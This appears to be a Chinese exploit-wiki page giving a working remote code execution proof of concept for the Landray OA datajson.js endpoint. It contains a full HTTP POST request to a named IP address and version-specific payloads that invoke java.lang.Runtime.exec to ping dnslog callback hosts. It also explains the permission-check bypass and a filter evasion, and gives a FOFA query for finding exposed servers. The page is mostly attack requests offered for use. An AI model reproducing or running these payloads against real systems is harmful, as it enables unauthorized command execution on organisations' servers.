蓝凌OA datajson.js 远程代码执行.md

fofamini-wiki

登录白背景

源码

###访问  FormulaParserByJS 判断版本

新版本访问 /admin.do?method=exportModuleVersion，会返回空白页面，旧版则会导出版本文件

POST /data/sys-common/datajson.js HTTP/1.1
Host: 120.79.1.7
Cookie: SESSION=YjA5MWNkNzUtODU0ZC00NDY0LWJhODItN2JiMzM3Nzg2MTkw; Hm_lvt_4d829b71a81ae4cea109b50ec0d9b4f3=1646928099; Hm_lpvt_4d829b71a81ae4cea109b50ec0d9b4f3=1646928099
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

s_bean=sysFormulaSimulateByJS&script=var+calc='ping+v16pwned.ozcbbt.dnslog.cn';java.lang.Runtime.getRuntime().exec(calc)&type=1

###    
# V15:
/data/sys-common/datajson.js?

s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec("ping%20-c%204%20123.ekn8d3.dnslog.cn")&type=1

## V16:
/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=var+calc='ping+123.jc98e8.dnslog.cn';java.lang.Runtime.getRuntime().exec(calc)&type=1

其实直接使用v16版本poc也行，都是一个意思，只是官方v16新版有过滤之类的东西，直接exec("cmd")会400状态，所以改了下poc
还有之所以改成datajson.js是为了绕过权限校验，比较奇葩，v15（https://120.79.1.7:8443），均为官方演示站点，fofa关键字 icon_hash="831854882" && "[landray.com.cn](http://landray.com.cn)"

```
###访问  FormulaParserByJS 判断版本

新版本访问 /admin.do?method=exportModuleVersion，会返回空白页面，旧版则会导出版本文件
```

```
POST /data/sys-common/datajson.js HTTP/1.1
Host: 120.79.1.7
Cookie: SESSION=YjA5MWNkNzUtODU0ZC00NDY0LWJhODItN2JiMzM3Nzg2MTkw; Hm_lvt_4d829b71a81ae4cea109b50ec0d9b4f3=1646928099; Hm_lpvt_4d829b71a81ae4cea109b50ec0d9b4f3=1646928099
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

s_bean=sysFormulaSimulateByJS&script=var+calc='ping+v16pwned.ozcbbt.dnslog.cn';java.lang.Runtime.getRuntime().exec(calc)&type=1
```

```
###    
# V15:
/data/sys-common/datajson.js?

s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec("ping%20-c%204%20123.ekn8d3.dnslog.cn")&type=1

## V16:
/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=var+calc='ping+123.jc98e8.dnslog.cn';java.lang.Runtime.getRuntime().exec(calc)&type=1

其实直接使用v16版本poc也行，都是一个意思，只是官方v16新版有过滤之类的东西，直接exec("cmd")会400状态，所以改了下poc
还有之所以改成datajson.js是为了绕过权限校验，比较奇葩，v15（https://120.79.1.7:8443），均为官方演示站点，fofa关键字 icon_hash="831854882" && "[landray.com.cn](http://landray.com.cn)"
```